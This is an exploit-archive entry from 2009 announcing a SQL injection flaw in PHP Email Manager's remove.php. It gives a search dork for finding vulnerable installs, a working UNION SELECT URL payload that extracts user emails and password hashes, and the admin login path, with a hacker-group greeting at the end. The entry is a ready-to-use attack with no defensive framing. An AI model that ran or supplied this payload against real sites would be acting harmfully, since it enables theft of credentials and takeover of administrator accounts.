[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : PHP Email Manager (remove.php ID) SQL Injection Vulnerability
# Published : 2009-08-18
# Author : MuShTaQ
# Previous Title : In-Portal 4.3.1 (index.php env) Local File Inclusion Vulnerability
# Next Title : CBAuthority - ClickBank Affiliate Management SQL Injection Vulnerability


===========================================|->
      ~ Mtrb3 hena [Security-Code] ~
===========================================|->

script :-> PHP Email Manager  < Remote SQL Injection Vulnerability >

Downlode:->http://webscripts.softpedia.com/script/Mailing-List-Managers/PHP-eMail-Manager-30652.html

Dork:->PHPEmailManager

Found by :-> [ MuShTaQ ]

from :-> [WwW.SeC-CoDe.com]

C0ntact :a7m@mail.com

===========================================|->
              ~  Exploit ~
===========================================|->

File :-> http//www.site.com/PHPEmailManager/remove.php?ID=[SQL]

Exploit:-> http://www.site.com/PHPEmailManager/remove.php?ID=-1+union+select+1,concat%28Email,0x3a,PasswordHash%29,3,4,5,6,7,8,9,10,11+from+php_email_man_Users--

Admin Login:-> http//www.site.com/PHPEmailManager/login.php


-:::::::::::::::::: GreeetZ:::::::::::::::::-

Sniper.vb , Mr.Nrfzh,and all friends

Bay Bay

# www.Syue.com [2009-08-18]